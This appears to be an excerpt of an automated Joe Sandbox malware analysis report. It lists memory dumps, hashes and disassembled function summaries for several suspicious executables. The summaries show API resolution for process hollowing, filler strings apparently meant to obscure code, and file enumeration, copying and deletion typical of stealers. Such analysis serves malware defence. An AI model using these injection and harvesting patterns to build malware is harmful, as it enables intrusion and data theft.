Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction ID: 366af7cefd98687957400b87ee55d9c47e3829abc21eee9016022b0ee7c5b167
Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction Fuzzy Hash: FDB17DB29002A59FDB11CF28D8417FEBBF9EF95340F14856AE885EB349D6389D41CB60

Function 0090BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0090BAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 0090BB14
_xtime_get.LIBCPMT ref: 0090BB37
__Xtime_diff_to_millis2.LIBCPMT ref: 0090BB43

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 906348bae2102637fc151600c74ae2edff3753bb92f0c3caf7db54993a881ed5
Instruction ID: 4a46cba881295599b4d0d7becae79430385da980b66b39dcd3227be1449db55a
Opcode Fuzzy Hash: 906348bae2102637fc151600c74ae2edff3753bb92f0c3caf7db54993a881ed5
Instruction Fuzzy Hash: 582151B5A052099FDF10EFA4DC45ABEBBB8EF49710F000165FA01B72D1DB70AD019BA1

Analysis Process: server.exePID: 6264, Parent PID: 6432COMMON

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	6.2%
Total number of Nodes:	65
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF6831111AD Relevance: 1.3, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_initterm.MSVCRT ref: 00007FF683111201

Memory Dump Source

Source File: 00000009.00000002.2954140232.00007FF683111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF683110000, based on PE: true

Associated: 00000009.00000002.2954048369.00007FF683110000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2954434327.00007FF683382000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2954480696.00007FF683391000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2954562034.00007FF6833A8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2954562034.00007FF6833AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2954562034.00007FF68340D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2954848341.00007FF683411000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff683110000_server.jbxd

Similarity

API ID: _initterm
String ID:
API String ID: 4163712557-0
Opcode ID: 59d23ec67589e6339faaf0efac472b215ec1900d7054847c37bbe288dbd91d8b
Instruction ID: c517ffa1fdb0233c92ce87e309b8266438a427cd6a49836e22c64d06557b65a3
Opcode Fuzzy Hash: 59d23ec67589e6339faaf0efac472b215ec1900d7054847c37bbe288dbd91d8b
Instruction Fuzzy Hash: BD31A176E09B86C6EA409F56E9533687761BF49B80F48443ACD4CEB3B6DE6DE440C310

Analysis Process: build_2024-07-25_20-56.exePID: 2260, Parent PID: 6432COMMON

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	43

Executed Functions

Function 00417A40 Relevance: 235.2, APIs: 121, Strings: 13, Instructions: 726
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76210000,024FA820), ref: 00417A55
GetProcAddress.KERNEL32(76210000,024FA960), ref: 00417A6D
GetProcAddress.KERNEL32(76210000,0251A750), ref: 00417A86
GetProcAddress.KERNEL32(76210000,0251A660), ref: 00417A9E
GetProcAddress.KERNEL32(76210000,0251A780), ref: 00417AB6
GetProcAddress.KERNEL32(76210000,0251D100), ref: 00417ACF
GetProcAddress.KERNEL32(76210000,024F8048), ref: 00417AE7
GetProcAddress.KERNEL32(76210000,0251D118), ref: 00417AFF
GetProcAddress.KERNEL32(76210000,0251D238), ref: 00417B18
GetProcAddress.KERNEL32(76210000,0251D1F0), ref: 00417B30
GetProcAddress.KERNEL32(76210000,0251D0B8), ref: 00417B48
GetProcAddress.KERNEL32(76210000,024FA860), ref: 00417B61
GetProcAddress.KERNEL32(76210000,024FA900), ref: 00417B79
GetProcAddress.KERNEL32(76210000,024FAB40), ref: 00417B91
GetProcAddress.KERNEL32(76210000,024FA8E0), ref: 00417BAA
GetProcAddress.KERNEL32(76210000,0251D250), ref: 00417BC2
GetProcAddress.KERNEL32(76210000,0251CFC8), ref: 00417BDA
GetProcAddress.KERNEL32(76210000,024F8368), ref: 00417BF3
GetProcAddress.KERNEL32(76210000,024FAA40), ref: 00417C0B
GetProcAddress.KERNEL32(76210000,0251D1A8), ref: 00417C23
GetProcAddress.KERNEL32(76210000,0251D1D8), ref: 00417C3C
GetProcAddress.KERNEL32(76210000,0251D178), ref: 00417C54
GetProcAddress.KERNEL32(76210000,0251D190), ref: 00417C6C
GetProcAddress.KERNEL32(76210000,024FA920), ref: 00417C85
GetProcAddress.KERNEL32(76210000,0251CFE0), ref: 00417C9D
GetProcAddress.KERNEL32(76210000,0251CFB0), ref: 00417CB5
GetProcAddress.KERNEL32(76210000,0251D010), ref: 00417CCE
GetProcAddress.KERNEL32(76210000,0251D130), ref: 00417CE6
GetProcAddress.KERNEL32(76210000,0251CF80), ref: 00417CFE
GetProcAddress.KERNEL32(76210000,0251D028), ref: 00417D17
GetProcAddress.KERNEL32(76210000,0251CFF8), ref: 00417D2F
GetProcAddress.KERNEL32(76210000,0251D040), ref: 00417D47
GetProcAddress.KERNEL32(76210000,0251D1C0), ref: 00417D60
GetProcAddress.KERNEL32(76210000,024F8E10), ref: 00417D78
GetProcAddress.KERNEL32(76210000,0251D0D0), ref: 00417D90
GetProcAddress.KERNEL32(76210000,0251D0E8), ref: 00417DA9
GetProcAddress.KERNEL32(76210000,024FA980), ref: 00417DC1
GetProcAddress.KERNEL32(76210000,0251D148), ref: 00417DD9
GetProcAddress.KERNEL32(76210000,024FAAA0), ref: 00417DF2
GetProcAddress.KERNEL32(76210000,0251D0A0), ref: 00417E0A
GetProcAddress.KERNEL32(76210000,0251D058), ref: 00417E22
GetProcAddress.KERNEL32(76210000,024FAAC0), ref: 00417E3B
GetProcAddress.KERNEL32(76210000,024FA9A0), ref: 00417E53
GetProcAddress.KERNEL32(76210000,CreateProcessA), ref: 00417E6A
GetProcAddress.KERNEL32(76210000,GetThreadContext), ref: 00417E80
GetProcAddress.KERNEL32(76210000,ReadProcessMemory), ref: 00417E97
GetProcAddress.KERNEL32(76210000,VirtualAllocEx), ref: 00417EAE
GetProcAddress.KERNEL32(76210000,ResumeThread), ref: 00417EC4
GetProcAddress.KERNEL32(76210000,WriteProcessMemory), ref: 00417EDB
GetProcAddress.KERNEL32(76210000,SetThreadContext), ref: 00417EF2
LoadLibraryA.KERNEL32(0251D160,004166E1), ref: 00417F03
LoadLibraryA.KERNEL32(0251D070), ref: 00417F15
LoadLibraryA.KERNEL32(0251D088), ref: 00417F27
LoadLibraryA.KERNEL32(0251D208), ref: 00417F38
LoadLibraryA.KERNEL32(0251D220), ref: 00417F4A
LoadLibraryA.KERNEL32(0251D268), ref: 00417F5C
LoadLibraryA.KERNEL32(0251CF98), ref: 00417F6D
LoadLibraryA.KERNEL32(0251D310), ref: 00417F7F
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00417F8F
GetProcAddress.KERNEL32(751E0000,024FA400), ref: 00417FAB
GetProcAddress.KERNEL32(751E0000,0251D2B0), ref: 00417FC3
GetProcAddress.KERNEL32(751E0000,0251B7F8), ref: 00417FDB
GetProcAddress.KERNEL32(751E0000,0251D280), ref: 00417FF4
GetProcAddress.KERNEL32(751E0000,024FA720), ref: 0041800C
GetProcAddress.KERNEL32(73F70000,024F8188), ref: 0041802C
GetProcAddress.KERNEL32(73F70000,024FA5A0), ref: 00418044
GetProcAddress.KERNEL32(73F70000,024F8390), ref: 0041805C
GetProcAddress.KERNEL32(73F70000,0251D298), ref: 00418075
GetProcAddress.KERNEL32(73F70000,0251D2C8), ref: 0041808D
GetProcAddress.KERNEL32(73F70000,024FA420), ref: 004180A5
GetProcAddress.KERNEL32(73F70000,024FA6C0), ref: 004180BE
GetProcAddress.KERNEL32(73F70000,0251D328), ref: 004180D6
GetProcAddress.KERNEL32(753A0000,024FA480), ref: 004180F2
GetProcAddress.KERNEL32(753A0000,024FA4A0), ref: 0041810A
GetProcAddress.KERNEL32(753A0000,0251D2E0), ref: 00418122
GetProcAddress.KERNEL32(753A0000,0251D2F8), ref: 0041813B
GetProcAddress.KERNEL32(753A0000,024FA560), ref: 00418153
GetProcAddress.KERNEL32(76310000,024F7F30), ref: 00418173
GetProcAddress.KERNEL32(76310000,024F7EB8), ref: 0041818B
GetProcAddress.KERNEL32(76310000,0251D340), ref: 004181A3
GetProcAddress.KERNEL32(76310000,024FA460), ref: 004181BC
GetProcAddress.KERNEL32(76310000,024FA7A0), ref: 004181D4
GetProcAddress.KERNEL32(76310000,024F7EE0), ref: 004181EC
GetProcAddress.KERNEL32(76910000,0251D610), ref: 0041820C
GetProcAddress.KERNEL32(76910000,024FA540), ref: 00418224
GetProcAddress.KERNEL32(76910000,0251B798), ref: 0041823D
GetProcAddress.KERNEL32(76910000,0251D670), ref: 00418255
GetProcAddress.KERNEL32(76910000,0251D388), ref: 0041826D
GetProcAddress.KERNEL32(76910000,024FA440), ref: 00418286
GetProcAddress.KERNEL32(76910000,024FA520), ref: 0041829E
GetProcAddress.KERNEL32(76910000,0251D538), ref: 004182B6
GetProcAddress.KERNEL32(76910000,0251D3B8), ref: 004182CF
GetProcAddress.KERNEL32(75B30000,024FA4C0), ref: 004182EB
GetProcAddress.KERNEL32(75B30000,0251D460), ref: 00418303
GetProcAddress.KERNEL32(75B30000,0251D550), ref: 0041831C
GetProcAddress.KERNEL32(75B30000,0251D658), ref: 00418334
GetProcAddress.KERNEL32(75B30000,0251D3A0), ref: 0041834C
GetProcAddress.KERNEL32(75670000,024FA6A0), ref: 00418368
GetProcAddress.KERNEL32(75670000,024FA3C0), ref: 00418380
GetProcAddress.KERNEL32(76AC0000,024FA500), ref: 0041839C
GetProcAddress.KERNEL32(76AC0000,0251D568), ref: 004183B4
GetProcAddress.KERNEL32(6F500000,024FA580), ref: 004183D4
GetProcAddress.KERNEL32(6F500000,024FA740), ref: 004183EC
GetProcAddress.KERNEL32(6F500000,024FA660), ref: 00418405
GetProcAddress.KERNEL32(6F500000,0251D478), ref: 0041841D
GetProcAddress.KERNEL32(6F500000,024FA760), ref: 00418435
GetProcAddress.KERNEL32(6F500000,024FA780), ref: 0041844E
GetProcAddress.KERNEL32(6F500000,024FA4E0), ref: 00418466
GetProcAddress.KERNEL32(6F500000,024FA700), ref: 0041847E
GetProcAddress.KERNEL32(6F500000,HttpQueryInfoA), ref: 00418495
GetProcAddress.KERNEL32(6F500000,InternetSetOptionA), ref: 004184AC
GetProcAddress.KERNEL32(75AE0000,0251D5C8), ref: 004184C8
GetProcAddress.KERNEL32(75AE0000,0251B8D8), ref: 004184E0
GetProcAddress.KERNEL32(75AE0000,0251D5F8), ref: 004184F9
GetProcAddress.KERNEL32(75AE0000,0251D520), ref: 00418511
GetProcAddress.KERNEL32(76300000,024FA620), ref: 0041852D
GetProcAddress.KERNEL32(6C790000,0251D400), ref: 00418549
GetProcAddress.KERNEL32(6C790000,024FA5C0), ref: 00418561
GetProcAddress.KERNEL32(6C790000,0251D628), ref: 0041857A
GetProcAddress.KERNEL32(6C790000,0251D4C0), ref: 00418592
GetProcAddress.KERNEL32(6C5A0000,SymMatchString), ref: 004185AC

Strings

CreateProcessA, xrefs: 00417E5F
P2#v, xrefs: 00417C48
VirtualAllocEx, xrefs: 00417EA3
GetThreadContext, xrefs: 00417E7A
HttpQueryInfoA, xrefs: 0041848A
SetThreadContext, xrefs: 00417EE7
WriteProcessMemory, xrefs: 00417ED0
ResumeThread, xrefs: 00417EBE
InternetSetOptionA, xrefs: 004184A1
1#v, xrefs: 00417D3B
ReadProcessMemory, xrefs: 00417E8C
dbghelp.dll, xrefs: 00417F85
SymMatchString, xrefs: 004185A6

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$P2#v$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll$1#v
API String ID: 2238633743-3379916010
Opcode ID: 99bfb0a2137326516713e216a9d450e559a5b5e2ebbfb807218a3a1d6a70ef3d
Instruction ID: 063c43ef11668f3b4bcf1e06991fb7fc39d12d8cee9b34c79393d9f3b317e2b6
Opcode Fuzzy Hash: 99bfb0a2137326516713e216a9d450e559a5b5e2ebbfb807218a3a1d6a70ef3d
Instruction Fuzzy Hash: 5A6211B9A106009FD714DFA5EE8A9263BFBF7C87013147519EA06C3364E7B8A841CF95

Function 00402000 Relevance: 70.1, APIs: 39, Strings: 1, Instructions: 124
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402014
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040201B
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402022
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402029
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402030
GetProcessHeap.KERNEL32(00000000,?,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040203B
RtlAllocateHeap.NTDLL(00000000,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402042
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402052
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402059
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402060
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402067
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040206E
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402079
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402080
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402087
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040208E
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402095
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020AB
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020B2
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020B9
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020C0
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020C7
lstrlenA.KERNEL32(?,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020CF
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020F0
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020F7
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020FE
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402105
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040210C
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040211C
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402123
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040212A
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402131
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402138
VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 0040214D
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 00402158
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 0040215F
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 00402166
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 0040216D
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 00402174

Strings

In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention , xrefs: 0040200F, 00402016, 0040201D, 00402024, 0040202B, 0040204A, 00402054, 0040205B, 00402062, 00402069, 00402070, 0040207B, 00402082, 00402089, 00402090, 004020A6, 004020AD, 004020B4, 004020BB, 004020C2, 004020E0, 004020F2, 004020F9, 00402100, 00402107, 00402117, 0040211E, 00402125, 0040212C, 00402133, 00402153, 0040215A, 00402161, 00402168, 0040216F

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtual
String ID: In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention
API String ID: 2533436356-3600131318
Opcode ID: a4167687b35c2fc6c3f12c85d54bc1d37fc4993539ebfefbbc702df93726a96d
Instruction ID: 155b361810c2162a8ce7a193311da36ac5826eab53bfc95ccb16ddaea6ec9530
Opcode Fuzzy Hash: a4167687b35c2fc6c3f12c85d54bc1d37fc4993539ebfefbbc702df93726a96d
Instruction Fuzzy Hash: C131BA21F8033CF79660EBED6C4AF5E6EF5FF8CB50BA0425779085558289A85401CEAF

Function 00414F80 Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 325
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00414FA0
FindFirstFileA.KERNEL32(?,?), ref: 00414FB7
memset.MSVCRT ref: 00414FD0
memset.MSVCRT ref: 00414FE3
StrCmpCA.SHLWAPI(?,004201DC), ref: 0041500F
StrCmpCA.SHLWAPI(?,004201D8), ref: 00415029
wsprintfA.USER32 ref: 0041504E
StrCmpCA.SHLWAPI(?,004201E9), ref: 00415060
wsprintfA.USER32 ref: 00415088

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

wsprintfA.USER32 ref: 004150AA
memset.MSVCRT ref: 004150C1
lstrcatA.KERNEL32(?,?), ref: 004150D1
strtok_s.MSVCRT ref: 004150E7
strtok_s.MSVCRT ref: 00415116
memset.MSVCRT ref: 00415130
lstrcatA.KERNEL32(?,?), ref: 00415140
strtok_s.MSVCRT ref: 00415156
PathMatchSpecA.SHLWAPI(?,00000000), ref: 0041516E
DeleteFileA.KERNEL32(00000000,00000000,?,0251D430,?,?,?,004201E0,?,00000000,?,004201E9), ref: 0041520F
CopyFileA.KERNEL32(?,00000000,00000001), ref: 00415227

Part of subcall function 00410F90: CreateFileA.KERNEL32(;RA,80000000,00000003,00000000,00000003,00000080,00000000,?,0041523B,00000000,?,004201E9), ref: 00410FAD
Part of subcall function 00410F90: GetFileSizeEx.KERNEL32(00000000,?,?,004201E9), ref: 00410FBF
Part of subcall function 00410F90: CloseHandle.KERNEL32(00000000,?,004201E9), ref: 00410FCA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00415247
DeleteFileA.KERNEL32(00000000,00000000,?,000003E8,00000000,?,?,004201E9), ref: 00415259
strtok_s.MSVCRT ref: 00415272
FindNextFileA.KERNELBASE(?,?), ref: 00415374
FindClose.KERNEL32(?), ref: 00415386

Strings

%s\*.*, xrefs: 00414F9A
1#v, xrefs: 00414FB7
%s\%s\%s, xrefs: 00415082
P2#v, xrefs: 00415374
%s\%s, xrefs: 00415048, 004150A4

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
